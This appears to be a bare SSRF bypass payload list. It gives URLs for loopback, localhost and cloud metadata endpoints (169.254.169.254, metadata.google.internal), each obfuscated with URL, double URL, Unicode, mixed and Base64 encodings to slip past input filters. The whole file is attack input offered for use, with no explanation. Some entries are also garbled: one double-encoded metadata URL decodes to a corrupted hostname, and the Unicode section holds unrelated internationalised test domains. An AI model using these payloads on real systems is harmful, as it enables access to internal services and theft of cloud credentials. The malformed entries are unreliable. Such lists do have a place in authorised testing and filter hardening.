# URL Encoded
%68%74%74%70%3a%2f%2f%31%32%37%2e%30%2e%30%2e%31
%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74
%68%74%74%70%3a%2f%2f%31%32%37%2e%30%2e%30%2e%32
%68%74%74%70%3a%2f%2f%31%36%39%2e%32%35%34%2e%31%36%39%2e%32%35%34
%68%74%74%70%3a%2f%2f%6d%65%74%61%64%61%74%61%2e%67%6f%6f%67%6c%65%2e%69%6e%74%65%72%6e%61%6c
%68%74%74%70%3a%2f%2f%74%65%73%74%2e%74%65%73%74

# Double URL Encoded
%2568%2574%2574%2570%253a%252f%252f%2531%2532%2537%252e%2530%252e%2530%252e%2531
%25252568%25252574%25252574%25252570%25253a%25252f%25252f%252531%252532%252537%25252e%252530%25252e%252530%25252e%252531
%25252568%25252574%25252574%25252570%25253a%25252f%25252f%252531%252532%252532%25252e%252530%25252e%252530%25252e%252532
%25252568%25252574%25252574%25252570%25253a%25252f%25252f%252531%252536%252539%25252e%252532%252535%252534%25252e%252531%252536%252539%25252e%252532%252535%252534
%25252568%25252574%25252574%25252570%25253a%25252f%25252f%25256d%252565%252574%252561%252564%252561%252574%252561%25252e%252567%25256f%25256f%252567%2526%25256c%25256e%25256e%25256e%25256e%25256c

# Unicode Encoded
ⓗⓣⓣⓟ://①②⑦.⓪.⓪.①
ⓗⓣⓣⓟ://②③④.⑤⑥⑦.⑧⑨.①⓪
http://⑯⑨.②⑤④.⑯⑨.②⑤④
http://例子.测试
http://xn--fsqu00a.xn--0zwm56d
http://％Ｅ４％ＢＢ％Ａ３％Ｅ６％Ｂ５％８Ｂ
http://мойдомен.рф
http://测试.测试
http://例え.テスト
http://مثال.إختبار
http://例子.測試

# Mixed Encoding
h%74%74p://127.0.0.1
ht%74p://127.0.0.1
htt%70://127.0.0.1
http%3A%2F%2F127.0.0.1
http%3a%2f%2f127.0.0.1
http%253A%252F%252F127.0.0.1
http%25253A%25252F%25252F127.0.0.1
127%2e0%2e0%2e1
127%252e0%252e0%252e1
h%74%74p://localhost
ht%74p://localhost
htt%70://localhost
http%3A%2F%2Flocalhost
http%253A%252F%252Flocalhost
localhost%2e0%2e1
localhost%252e0%252e1

# Base64 Encoded
aHR0cDovLzEyNy4wLjAuMS8=
aHR0cDovL2xvY2FsaG9zdC8=
aHR0cHM6Ly8xMjcuMC4wLjE=
aHR0cHM6Ly9sb2NhbGhvc3Qv
aHR0cDovLzE2OS4yNTQuMTY5LjI1NC8=
aHR0cDovL21ldGFkYXRhLmdvb2dsZS5pbnRlcm5hbC8=
aHR0cDovLzEwMC4xMDAuMTAwLjIwMC8=
aHR0cDovLzEyNy4wLjAuMg==
aHR0cDovLzEyNy4wLjAuMw==
aHR0cDovLzE2OS4yNTQuMTY5LjI1NC8=
aHR0cDovLzEyNy4wLjAuMQ==
aHR0cDovLzEyNy4wLjAuMQov
aHR0cDovLzEyNy4wLjAuMS9mb28=
aHR0cDovLzEyNy4wLjAuMS9iYXIv
aHR0cDovLzEyNy4wLjAuMS9kb3Qv
aHR0cDovLzEyNy4wLjAuMS9QYXlsb2Fk
